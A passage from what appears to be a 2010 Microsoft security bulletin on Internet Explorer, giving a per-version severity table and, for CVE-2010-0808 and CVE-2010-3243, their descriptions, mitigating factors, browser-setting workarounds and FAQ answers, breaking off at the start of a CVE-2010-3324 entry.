\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 7 in Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nInternet Explorer 8\t \t \t \t \t \t \t \t \t \t \t \r\n\r\nInternet Explorer 8 for Windows XP Service Pack 3\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 8 for Windows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 8 for Windows Server 2003 Service Pack 2\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 8 for Windows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 8 in Vista Service Pack 1 and Windows Vista Service Pack 2\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 8 in Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 8 in Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2**\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 8 in Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2**\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 8 in Windows 7 for 32-bit Systems\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 8 in Windows 7 for x64-based Systems\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 8 in Windows Server 2008 R2 for x64-based Systems**\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 8 in Windows Server 2008 R2 for Itanium-based Systems\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\n**Server Core installation not affected. The vulnerabilities addressed by this update do not affect supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, when installed using the Server Core installation option. For more information on this installation option, see the TechNet articles, Managing a Server Core Installation and Servicing a Server Core Installation. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.\r\nTop of sectionTop of section\r\n\t\r\nAutoComplete Information Disclosure Vulnerability - CVE-2010-0808\r\n\r\nAn information disclosure vulnerability exists that potentially allows form data within Internet Explorer to be captured via the AutoComplete feature. An attacker could exploit the vulnerability by constructing a specially crafted Web page that could allow information disclosure if a user viewed the Web page. An attacker who successfully exploited this vulnerability could capture information previously entered into fields after the AutoComplete feature has been enabled.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-0808.\r\n\t\r\nMitigating Factors for AutoComplete Information Disclosure Vulnerability - CVE-2010-0808\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See the FAQ subsection of this vulnerability section for more information about Internet Explorer Enhanced Security Configuration.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for AutoComplete Information Disclosure Vulnerability - CVE-2010-0808\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nSet Internet and Local intranet security zone settings to "High" to block ActiveX Controls and Active Scripting in these zones\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings for the Internet security zone to block ActiveX controls and Active Scripting. You can do this by setting your browser security to High.\r\n\r\nTo raise the browsing security level in Internet Explorer, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nUnder Security level for this zone, move the slider to High. This sets the security level for all Web sites you visit to High.\r\n\r\nNote If no slider is visible, click Default Level, and then move the slider to High.\r\n\r\nNote Setting the level to High may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly even with the security setting set to High.\r\n\r\nImpact of workaround. There are side effects to blocking ActiveX Controls and Active Scripting. Many Web sites that are on the Internet or on an intranet use ActiveX or Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX Controls to provide menus, ordering forms, or even account statements. Blocking ActiveX Controls or Active Scripting is a global setting that affects all Internet and intranet sites. If you do not want to block ActiveX Controls or Active Scripting for such sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to block ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect yourself from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\n\u2022\t\r\n\r\nConfigure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Internet Options on the Tools menu.\r\n\r\n2.\r\n\t\r\n\r\nClick the Security tab.\r\n\r\n3.\r\n\t\r\n\r\nClick Internet, and then click Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nNote Disabling Active Scripting in the Internet and Local intranet security zones may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly.\r\n\r\nImpact of workaround. There are side effects to prompting before running Active Scripting. Many Web sites that are on the Internet or on an intranet use Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use Active Scripting to provide menus, ordering forms, or even account statements. Prompting before running Active Scripting is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run Active Scripting. If you do not want to be prompted for all these sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to require a prompt before it runs ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect you from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for AutoComplete Information Disclosure Vulnerability - CVE-2010-0808\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is an information disclosure vulnerability. An attacker who exploited the vulnerability when a user views a Web page could capture content entered into form fields if the AutoComplete feature has been enabled.\r\n\r\nWhat causes the vulnerability? \r\nInternet Explorer allows for automated, scripted instructions to simulate user actions on the AutoComplete feature.\r\n\r\nWhat is the AutoComplete feature? \r\nAutoComplete is a feature in Internet Explorer that helps users quickly enter information in form fields. For more information, see the MSDN article, Using AutoComplete in HTML Forms.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could potentially capture data previously entered into forms in the browser. The AutoComplete feature is disabled by default.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could host a specially crafted Web site that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the Web site. The attacker could also take advantage of compromised Web sites and Web sites that accept or host user-provided content or advertisements. These Web sites could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or in an Instant Messenger message that takes users to the attacker's Web site. It could also be possible to display specially crafted Web content by using banner advertisements or by using other methods to deliver Web content to affected systems.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user be logged on and visiting a Web site for any malicious action to occur. Therefore, any systems where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the AutoComplete feature within Internet Explorer.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2010-0808.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nI am running Internet Explorer for Windows Server 2003 or Windows Server 2008. Does this mitigate this vulnerability? \r\nYes. By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. Enhanced Security Configuration is a group of preconfigured settings in Internet Explorer that can reduce the likelihood of a user or administrator downloading and running specially crafted Web content on a server. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See also Managing Internet Explorer Enhanced Security Configuration.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nHTML Sanitization Vulnerability - CVE-2010-3243\r\n\r\nAn information disclosure vulnerability exists in the way that the toStaticHTML API sanitizes HTML, that could allow an attacker to perform cross-site scripting attacks and run script in the security context of the logged-on user. An attacker who successfully exploited this vulnerability could execute a cross-site scripting attack on the user, allowing the attacker to execute script in the user's security context against a site that is using the toStaticHTML API.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3243.\r\n\t\r\nMitigating Factors for HTML Sanitization Vulnerability - CVE-2010-3243\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See the FAQ subsection of this vulnerability section for more information about Internet Explorer Enhanced Security Configuration.\r\n\u2022\t\r\n\r\nOnly Web sites that is using toStaticHTML may potentially be affected.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for HTML Sanitization Vulnerability - CVE-2010-3243\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nRead e-mails in plain text\r\n\r\nTo help protect yourself from the e-mail attack vector, read e-mail messages in plain text format.\r\n\r\nMicrosoft Office Outlook 2002 users who have applied Office XP Service Pack 1 or a later version and Microsoft Office Outlook Express 6 users who have applied Internet Explorer 6 Service Pack 1 or a later version can enable this setting and view e-mail messages that are not digitally signed or e-mail messages that are not encrypted in plain text only.\r\n\r\nDigitally signed e-mail messages or encrypted e-mail messages are not affected by the setting and may be read in their original formats. For more information about how to enable this setting in Outlook 2002, see Microsoft Knowledge Base Article 307594.\r\n\r\nFor information about this setting in Outlook Express 6, see Microsoft Knowledge Base Article 291387.\r\n\r\nImpact of workaround. E-mail messages that are viewed in plain text format will not contain pictures, specialized fonts, animations, or other rich content. Additionally:\r\n\u2022\t\r\n\r\nThe changes are applied to the preview pane and to open messages.\r\n\u2022\t\r\n\r\nPictures become attachments so that they are not lost.\r\n\u2022\t\r\n\r\nBecause the message is still in Rich Text or HTML format in the store, the object model (custom code solutions) may behave unexpectedly.\r\n\u2022\t\r\n\r\nSet Internet and Local intranet security zone settings to "High" to block ActiveX Controls and Active Scripting in these zones\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings for the Internet security zone to block ActiveX controls and Active Scripting. You can do this by setting your browser security to High.\r\n\r\nTo raise the browsing security level in Internet Explorer, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nUnder Security level for this zone, move the slider to High. This sets the security level for all Web sites you visit to High.\r\n\r\nNote If no slider is visible, click Default Level, and then move the slider to High.\r\n\r\nNote Setting the level to High may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly even with the security setting set to High.\r\n\r\nImpact of workaround. There are side effects to blocking ActiveX Controls and Active Scripting. Many Web sites that are on the Internet or on an intranet use ActiveX or Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX Controls to provide menus, ordering forms, or even account statements. Blocking ActiveX Controls or Active Scripting is a global setting that affects all Internet and intranet sites. If you do not want to block ActiveX Controls or Active Scripting for such sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to block ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect yourself from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\n\u2022\t\r\n\r\nConfigure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Internet Options on the Tools menu.\r\n\r\n2.\r\n\t\r\n\r\nClick the Security tab.\r\n\r\n3.\r\n\t\r\n\r\nClick Internet, and then click Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nNote Disabling Active Scripting in the Internet and Local intranet security zones may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly.\r\n\r\nImpact of workaround. There are side effects to prompting before running Active Scripting. Many Web sites that are on the Internet or on an intranet use Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use Active Scripting to provide menus, ordering forms, or even account statements. Prompting before running Active Scripting is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run Active Scripting. If you do not want to be prompted for all these sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to require a prompt before it runs ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect you from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for HTML Sanitization Vulnerability - CVE-2010-3243\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is an information disclosure vulnerability. An attacker who exploited the vulnerability when a user views a Web page that uses the toStaticHTML API may execute a cross-site scripting attack on the user.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability exists in the way that Internet Explorer handles content using specific strings when sanitizing HTML.\r\n\r\nWhat is the toStaticHTML API? \r\nThe toStaticHTML API can be used to remove event attributes and script from user input before display as HTML. For more information, please see the MSDN Library article, toStaticHTML Method.\r\n\r\nIs this vulnerability related to CVE-2010-3243 in MS10-072, Vulnerabilities in toStaticHTML Could Allow Information Disclosure? \r\nYes, the HTML Sanitization Vulnerability, CVE-2010-4243, also affects Microsoft SharePoint.\r\n\r\nAre both updates necessary to be installed to be protected from the vulnerability? \r\nNo, each update addresses a separate application. Only the update that corresponds with software running on your system needs to be applied.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability, when a user is viewing HTML on a Web site that has not been properly sanitized by Internet Explorer, could execute script in the user's security context against a site.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nTo exploit this vulnerability, an attacker must have the ability to submit a specially crafted script to a target site. Due to the vulnerability, in specific situations the specially crafted script is not properly sanitized using toStaticHTML, and subsequently this could lead to attacker-supplied script being run in the security context of a user who views the malicious content on the Web site.\r\n\r\nFor cross-site scripting attacks, this vulnerability requires that a user be visiting a compromised Web site for any malicious action to occur. For instance, after an attacker has successfully submitted specially crafted script to the target site, any Web page on that site that contains the specially crafted script is a potential vector for persistent cross-site scripting attacks. When a user visits a Web page that contains the specially crafted script, the script could be run in the security context of the user on the site.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user be logged on and visiting a Web site for any malicious action to occur. Therefore, any systems where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nI am running Internet Explorer for Windows Server 2003 or Windows Server 2008. Does this mitigate this vulnerability? \r\nYes. By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. Enhanced Security Configuration is a group of preconfigured settings in Internet Explorer that can reduce the likelihood of a user or administrator downloading and running specially crafted Web content on a server. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See also Managing Internet Explorer Enhanced Security Configuration.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that Internet Explorer handles HTML sanitization using toStaticHTML.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nHTML Sanitization Vulnerability - CVE-2010-3324\r\n\r\nAn information disclosure vulnerability exists in the way that the toStaticHTML API sanitizes HTML, that could allow an attacker to perform cross-site scripting attacks and run script in the security context of the logged-on user. An attacker who successfully exploited this vulnerability could execute a cross-site scripting attack on the user, allowing the attacker to execute script in the user's security context against a site that is using the toStaticHTML API.\r\n\r\nTo view this vulnerability as a standard entry in the Common 